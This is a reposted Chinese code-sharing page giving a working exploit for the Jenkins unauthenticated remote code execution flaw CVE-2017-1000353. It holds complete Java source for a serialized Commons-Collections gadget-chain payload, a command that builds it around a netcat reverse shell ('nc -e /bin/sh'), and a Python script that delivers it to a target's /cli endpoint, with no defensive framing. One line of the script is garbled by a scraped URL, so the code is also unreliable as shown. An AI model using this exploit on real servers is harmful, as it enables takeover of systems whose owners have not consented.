首页 > 代码库 > Jenkins Unauthenticated Code Execution -- CVE-2017-1000353
Jenkins Unauthenticated Code Execution -- CVE-2017-1000353
将该Payload.java源代码编译为Payload.jar
import java.io.FileOutputStream; import java.io.ObjectOutputStream; import java.io.ObjectStreamException; import java.io.Serializable; import java.lang.reflect.Field; import java.security.KeyPair; import java.security.KeyPairGenerator; import java.security.PrivateKey; import java.security.PublicKey; import java.security.Signature; import java.security.SignedObject; import java.util.Comparator; import java.util.HashMap; import java.util.HashSet; import java.util.Map; import java.util.concurrent.ConcurrentSkipListSet; import java.util.concurrent.CopyOnWriteArraySet; import net.sf.json.JSONArray; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.collection.AbstractCollectionDecorator; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.keyvalue.TiedMapEntry; import org.apache.commons.collections.map.LazyMap; import org.apache.commons.collections.map.ReferenceMap; import org.apache.commons.collections.set.ListOrderedSet; public class Payload implements Serializable { private Serializable payload; public Payload(String cmd) throws Exception { this.payload = this.setup(cmd); } public Serializable setup(String cmd) throws Exception { final String[] execArgs = new String[] { cmd }; final Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }), new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }), new InvokerTransformer("exec", new Class[] { String.class }, execArgs), new ConstantTransformer(1) }; Transformer transformerChain = new ChainedTransformer(transformers); final Map innerMap = new HashMap(); final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); HashSet map = new HashSet(1); map.add("foo"); Field f = null; try { f = HashSet.class.getDeclaredField("map"); } catch (NoSuchFieldException e) { f = HashSet.class.getDeclaredField("backingMap"); } f.setAccessible(true); HashMap innimpl = (HashMap) f.get(map); Field f2 = null; try { f2 = HashMap.class.getDeclaredField("table"); } catch (NoSuchFieldException e) { f2 = HashMap.class.getDeclaredField("elementData"); } f2.setAccessible(true); Object[] array2 = (Object[]) f2.get(innimpl); Object node = array2[0]; if (node == null) { node = array2[1]; } Field keyField = null; try { keyField = node.getClass().getDeclaredField("key"); } catch (Exception e) { keyField = Class.forName("java.util.MapEntry").getDeclaredField( "key"); } keyField.setAccessible(true); keyField.set(node, entry); KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA"); keyPairGenerator.initialize(1024); KeyPair keyPair = keyPairGenerator.genKeyPair(); PrivateKey privateKey = keyPair.getPrivate(); PublicKey publicKey = keyPair.getPublic(); Signature signature = Signature.getInstance(privateKey.getAlgorithm()); SignedObject payload = new SignedObject(map, privateKey, signature); JSONArray array = new JSONArray(); array.add("asdf"); ListOrderedSet set = new ListOrderedSet(); Field f1 = AbstractCollectionDecorator.class .getDeclaredField("collection"); f1.setAccessible(true); f1.set(set, array); DummyComperator comp = new DummyComperator(); ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp); csls.add(payload); CopyOnWriteArraySet a1 = new CopyOnWriteArraySet(); CopyOnWriteArraySet a2 = new CopyOnWriteArraySet(); a1.add(set); Container c = new Container(csls); a1.add(c); a2.add(csls); a2.add(set); ReferenceMap flat3map = new ReferenceMap(); flat3map.put(new Container(a1), "asdf"); flat3map.put(new Container(a2), "asdf"); return flat3map; } private Object writeReplace() throws ObjectStreamException { return this.payload; } static class Container implements Serializable { private Object o; public Container(Object o) { this.o = o; } private Object writeReplace() throws ObjectStreamException { return o; } } static class DummyComperator implements Comparator, Serializable { public int compare(Object arg0, Object arg1) { // TODO Auto-generated method stub return 0; } private Object writeReplace() throws ObjectStreamException { return null; } } public static void main(String args[]) throws Exception{ if(args.length != 2){ System.out.println("java -jar payload.jar outfile cmd"); System.exit(0); } String cmd = args[1]; FileOutputStream out = new FileOutputStream(args[0]); Payload pwn = new Payload(cmd); ObjectOutputStream oos = new ObjectOutputStream(out); oos.writeObject(pwn); oos.flush(); out.flush(); } }
java -jar Payload.jar Payload.ser "nc -e /bin/sh 127.0.0.1 8888"
将该源代码保存为jenkins_unauthenticated_code_execution.py
#!/usr/bin/env python # -*- coding: utf-8 -*-
# Author: f0rsaken # CVE-2017-1000353 import requests import sys import threading import time import uuid SESSION = str(uuid.uuid4()) PREAMBLE = "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4=\x00\x00\x00\x00" SER = open("Payload.ser", "rb").read() def download(url, session): headers = {"Side": "download", "Session": session} r = requests.post(url, headers=headers) def upload(url, session, data): headers = {"Side": "upload", "Session": session} r = requests.post(url, headers=headers, data=http://www.mamicode.com/data) def exploit(target): URL = "http://" + target + "/cli" t = threading.Thread(target=download, args=(URL, SESSION)) try: t.start() time.sleep(1.2) upload(URL, SESSION, PREAMBLE+SER) except requests.RequestException as e: return False else: return target def main(): try: target = sys.argv[1] except IndexError as e: print("Jenkins Unauthenticated Code Execution") else: result = exploit(target) print(result) if __name__ == "__main__": main()
python jenkins_unauthenticated_code_execution.py 192.168.56.101:8080
Jenkins Unauthenticated Code Execution -- CVE-2017-1000353
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。